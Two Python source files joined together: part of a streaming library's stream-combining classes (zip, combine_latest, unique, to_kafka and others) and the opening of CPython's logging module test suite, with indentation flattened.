# Override method to handle removal of buffer for stream
self.buffers.pop(upstream)
super(zip, self)._remove_upstream(upstream)
def pack_literals(self, tup):
""" Fill buffers for literals whenever we empty them """
inp = list(tup)[::-1]
out = []
for i, val in self.literals:
while len(out) < i:
out.append(inp.pop())
out.append(val)
while inp:
out.append(inp.pop())
return tuple(out)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
L = self.buffers[who] # get buffer for stream
L.append((x, metadata))
if len(L) == 1 and all(self.buffers.values()):
vals = [self.buffers[up][0] for up in self.upstreams]
tup, md = builtins.zip(*vals)  # this class shadows the builtin zip
for buf in self.buffers.values():
buf.popleft()
self.condition.notify_all()
if self.literals:
tup = self.pack_literals(tup)
md = [m for ml in md for m in ml]
ret = self._emit(tup, md)
self._release_refs(md)
return ret
elif len(L) > self.maxsize:
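# Backpressure: this upstream has run too far ahead of its peers,
# so block it until another stream's update drains the buffers and
# calls notify_all().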
return self.condition.wait()
@Stream.register_api()
class combine_latest(Stream):
""" Combine multiple streams together to a stream of tuples
This will emit a new tuple of all of the most recent elements seen from
any stream.
Parameters
----------
emit_on : stream or list of streams or None
only emit upon update of the streams listed.
If None, emit on update from any stream
See Also
--------
zip
"""
_graphviz_orientation = 270
_graphviz_shape = 'triangle'
def __init__(self, *upstreams, **kwargs):
emit_on = kwargs.pop('emit_on', None)
self._initial_emit_on = emit_on
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
if emit_on is not None:
if not isinstance(emit_on, Iterable):
emit_on = (emit_on, )
emit_on = tuple(
upstreams[x] if isinstance(x, int) else x for x in emit_on)
self.emit_on = emit_on
else:
self.emit_on = upstreams
Stream.__init__(self, upstreams=upstreams, **kwargs)
def _add_upstream(self, upstream):
# Override method to handle setup of last and missing for new stream
self.last.append(None)
self.metadata.append(None)
self.missing.update([upstream])
super(combine_latest, self)._add_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def _remove_upstream(self, upstream):
# Override method to handle removal of last and missing for stream
if self.emit_on == upstream:
raise RuntimeError("Can't remove the ``emit_on`` stream since that"
"would cause no data to be emitted. "
"Consider adding an ``emit_on`` first by "
"running ``node.emit_on=(upstream,)`` to add "
"a new ``emit_on`` or running "
"``node.emit_on=tuple(node.upstreams)`` to "
"emit on all incoming data")
self.last.pop(self.upstreams.index(upstream))
self.metadata.pop(self.upstreams.index(upstream))
self.missing.remove(upstream)
super(combine_latest, self)._remove_upstream(upstream)
if self._initial_emit_on is None:
self.emit_on = self.upstreams
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
if self.missing and who in self.missing:
self.missing.remove(who)
self.last[idx] = x
if not self.missing and who in self.emit_on:
tup = tuple(self.last)
md = [m for ml in self.metadata for m in ml]
return self._emit(tup, md)
@Stream.register_api()
class flatten(Stream):
""" Flatten streams of lists or iterables into a stream of elements
Examples
--------
>>> source = Stream()
>>> source.flatten().sink(print)
>>> for x in [[1, 2, 3], [4, 5], [6, 7, 7]]:
... source.emit(x)
1
2
3
4
5
6
7
7
See Also
--------
partition
"""
def update(self, x, who=None, metadata=None):
L = []
for i, item in enumerate(x):
if i == len(x) - 1:
y = self._emit(item, metadata=metadata)
else:
y = self._emit(item)
if type(y) is list:
L.extend(y)
else:
L.append(y)
return L
@Stream.register_api()
class unique(Stream):
""" Avoid sending through repeated elements
This deduplicates a stream so that only new elements pass through.
You can control how much of a history is stored with the ``maxsize=``
parameter. For example setting ``maxsize=1`` avoids sending through
elements when one is repeated right after the other.
Parameters
----------
maxsize: int or None, optional
number of stored unique values to check against
key : function, optional
Function which returns a representation of the incoming data.
For example ``key=lambda x: x['a']`` could be used to allow only
pieces of data with unique ``'a'`` values to pass through.
hashable : bool, optional
If True then data is assumed to be hashable, else it is not. This is
used for determining how to cache the history, if hashable then
either dicts or LRU caches are used, otherwise a deque is used.
Defaults to True.
Examples
--------
>>> source = Stream()
>>> source.unique(maxsize=1).sink(print)
>>> for x in [1, 1, 2, 2, 2, 1, 3]:
... source.emit(x)
1
2
1
3
"""
def __init__(self, upstream, maxsize=None, key=identity, hashable=True,
**kwargs):
self.key = key
self.maxsize = maxsize
if hashable:
self.seen = dict()
if self.maxsize:
from zict import LRU
self.seen = LRU(self.maxsize, self.seen)
else:
self.seen = []
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
y = self.key(x)
emit = True
if isinstance(self.seen, list):
if y in self.seen:
self.seen.remove(y)
emit = False
self.seen.insert(0, y)
if self.maxsize:
del self.seen[self.maxsize:]
if emit:
return self._emit(x, metadata=metadata)
else:
if self.seen.get(y, '~~not_seen~~') == '~~not_seen~~':
self.seen[y] = 1
return self._emit(x, metadata=metadata)
@Stream.register_api()
class union(Stream):
""" Combine multiple streams into one
Every element from any of the upstream streams will immediately flow
into the output stream. They will not be combined with elements from
other streams.
See also
--------
Stream.zip
Stream.combine_latest
"""
def __init__(self, *upstreams, **kwargs):
super(union, self).__init__(upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
return self._emit(x, metadata=metadata)
@Stream.register_api()
class pluck(Stream):
""" Select elements from elements in the stream.
Parameters
----------
pluck : object, list
The element(s) to pick from the incoming element in the stream
If an instance of list, will pick multiple elements.
Examples
--------
>>> source = Stream()
>>> source.pluck([0, 3]).sink(print)
>>> for x in [[1, 2, 3, 4], [4, 5, 6, 7], [8, 9, 10, 11]]:
... source.emit(x)
(1, 4)
(4, 7)
(8, 11)
>>> source = Stream()
>>> source.pluck('name').sink(print)
>>> for x in [{'name': 'Alice', 'x': 123}, {'name': 'Bob', 'x': 456}]:
... source.emit(x)
'Alice'
'Bob'
"""
def __init__(self, upstream, pick, **kwargs):
self.pick = pick
super(pluck, self).__init__(upstream, **kwargs)
def update(self, x, who=None, metadata=None):
if isinstance(self.pick, list):
return self._emit(tuple([x[ind] for ind in self.pick]),
metadata=metadata)
else:
return self._emit(x[self.pick], metadata=metadata)
@Stream.register_api()
class collect(Stream):
"""
Hold elements in a cache and emit them as a collection when flushed.
Examples
--------
>>> source1 = Stream()
>>> source2 = Stream()
>>> collector = collect(source1)
>>> collector.sink(print)
>>> source2.sink(collector.flush)
>>> source1.emit(1)
>>> source1.emit(2)
>>> source2.emit('anything') # flushes collector
...
[1, 2]
"""
def __init__(self, upstream, cache=None, metadata_cache=None, **kwargs):
if cache is None:
cache = deque()
self.cache = cache
if metadata_cache is None:
metadata_cache = deque()
self.metadata_cache = metadata_cache
Stream.__init__(self, upstream, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
self.cache.append(x)
if metadata:
if isinstance(metadata, list):
self.metadata_cache.extend(metadata)
else:
self.metadata_cache.append(metadata)
def flush(self, _=None):
out = tuple(self.cache)
metadata = list(self.metadata_cache)
self._emit(out, metadata)
self._release_refs(metadata)
self.cache.clear()
self.metadata_cache.clear()
@Stream.register_api()
class zip_latest(Stream):
"""Combine multiple streams together to a stream of tuples
The stream which this is called from is lossless. All elements from
the lossless stream are emitted regardless of when they came in.
This will emit a new tuple consisting of an element from the lossless
stream paired with the latest elements from the other streams.
Elements are only emitted when an element on the lossless stream is
received, similar to ``combine_latest`` with the ``emit_on`` flag.
See Also
--------
Stream.combine_latest
Stream.zip
"""
def __init__(self, lossless, *upstreams, **kwargs):
upstreams = (lossless,) + upstreams
self.last = [None for _ in upstreams]
self.metadata = [None for _ in upstreams]
self.missing = set(upstreams)
self.lossless = lossless
self.lossless_buffer = deque()
Stream.__init__(self, upstreams=upstreams, **kwargs)
def update(self, x, who=None, metadata=None):
self._retain_refs(metadata)
idx = self.upstreams.index(who)
if who is self.lossless:
self.lossless_buffer.append((x, metadata))
elif self.metadata[idx]:
self._release_refs(self.metadata[idx])
self.metadata[idx] = metadata
self.last[idx] = x
if self.missing and who in self.missing:
self.missing.remove(who)
if not self.missing:
L = []
while self.lossless_buffer:
self.last[0], self.metadata[0] = self.lossless_buffer.popleft()
md = [m for ml in self.metadata for m in ml]
L.append(self._emit(tuple(self.last), md))
self._release_refs(self.metadata[0])
return L
@Stream.register_api()
class latest(Stream):
""" Drop held-up data and emit the latest result
This allows you to skip intermediate elements in the stream if there is
some back pressure causing a slowdown. Use this when you only care about
the latest elements, and are willing to lose older data.
This passes through values without modification otherwise.
Examples
--------
>>> source.map(f).latest().map(g) # doctest: +SKIP
"""
_graphviz_shape = 'octagon'
def __init__(self, upstream, **kwargs):
self.condition = Condition()
self.next = []
self.next_metadata = None
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.loop.add_callback(self.cb)
def update(self, x, who=None, metadata=None):
if self.next_metadata:
self._release_refs(self.next_metadata)
self._retain_refs(metadata)
self.next = [x]
self.next_metadata = metadata
self.loop.add_callback(self.condition.notify)
@gen.coroutine
def cb(self):
while True:
yield self.condition.wait()
[x] = self.next
yield self._emit(x, self.next_metadata)
@Stream.register_api()
class to_kafka(Stream):
""" Writes data in the stream to Kafka
This stream accepts a string or bytes object. Call ``flush`` to ensure all
messages are pushed. Responses from Kafka are pushed downstream.
Parameters
----------
topic : string
The topic to write to
producer_config : dict
Settings to set up the stream, see
https://docs.confluent.io/current/clients/confluent-kafka-python/#configuration
https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md
Examples:
bootstrap.servers: Connection string (host:port) to Kafka
Examples
--------
>>> from streamz import Stream
>>> ARGS = {'bootstrap.servers': 'localhost:9092'}
>>> source = Stream()
>>> kafka = source.map(lambda x: str(x)).to_kafka('test', ARGS)
<to_kafka>
>>> for i in range(10):
... source.emit(i)
>>> kafka.flush()
"""
def __init__(self, upstream, topic, producer_config, **kwargs):
import confluent_kafka as ck
self.topic = topic
self.producer = ck.Producer(producer_config)
kwargs["ensure_io_loop"] = True
Stream.__init__(self, upstream, **kwargs)
self.stopped = False
self.polltime = 0.2
self.loop.add_callback(self.poll)
self.futures = []
@gen.coroutine
def poll(self):
while not self.stopped:
# executes callbacks for any delivered data, in this thread
# if no messages were sent, nothing happens
self.producer.poll(0)
yield gen.sleep(self.polltime)
def update(self, x, who=None, metadata=None):
future = gen.Future()
self.futures.append(future)
@gen.coroutine
def _():
while True:
try:
# this runs asynchronously, in C-K's thread
self.producer.produce(self.topic, x, callback=self.cb)
return
except BufferError:
yield gen.sleep(self.polltime)
except Exception as e:
future.set_exception(e)
return
self.loop.add_callback(_)
return future
@gen.coroutine
def cb(self, err, msg):
future = self.futures.pop(0)
if msg is not None and msg.value() is not None:
future.set_result(None)
yield self._emit(msg.value())
else:
future.set_exception(err or msg.error())
def flush(self, timeout=-1):
self.producer.flush(timeout)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# This was taken from distributed/utils.py
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
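# Usage sketch (hypothetical): run an async function on the shared background
# loop from synchronous code and wait for its result.
#
#     async def double(x):
#         return 2 * x
#
#     loop = get_io_loop(asynchronous=False)
#     assert sync(loop, double, 21) == 42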
|
test_logging.py | #!/usr/bin/env python
#
# Copyright 2001-2009 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2009 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import copy
import pickle
import io
import gc
import os
import re
import select
import socket
from socketserver import ThreadingTCPServer, StreamRequestHandler
import string
import struct
import sys
import tempfile
from test.support import captured_stdout, run_with_locale, run_unittest
import textwrap
import threading
import time
import types
import unittest
import warnings
import weakref
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> ([\w]+): ([\d]+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = logger_dict.copy()
self.saved_level_names = logging._levelNames.copy()
finally:
logging._releaseLock()
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
self.root_logger.addHandler(self.root_hdlr)
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelNames.clear()
logging._levelNames.update(self.saved_level_names)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(self.expected_log_pat)
try:
stream.reset()
actual_lines = stream.readlines()
except AttributeError:
# io.StringIO lacks a reset() method.
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warn(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warn(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warn(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
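#
# A minimal sketch of such a mapping (hypothetical names, not used by the
# tests below): translate application-specific codes to logging levels up
# front, then pass the translated value to Logger.log().
#
#     APP_TO_LOGGING = {0: logging.DEBUG, 1: logging.INFO, 2: logging.ERROR}
#     logger.log(APP_TO_LOGGING[app_level], "message")
#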
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in list(my_logging_levels.items()):
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
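# setUp created the handler as MemoryHandler(capacity=10,
# flushLevel=logging.WARNING, target=self.root_hdlr): it buffers up to
# 10 records and flushes early when a record at WARNING or above arrives.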
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
def apply_config(self, conf):
fn = tempfile.mktemp(".ini")
try:
    f = open(fn, "w")
    f.write(textwrap.dedent(conf))
    f.close()
    logging.config.fileConfig(fn)
finally:
os.remove(fn)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
    "ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
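# Framing note: this matches logging.handlers.SocketHandler, whose
# makePickle() prefixes each pickled record dict with struct.pack(">L", len).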
def unpickle(self, data):
return pickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
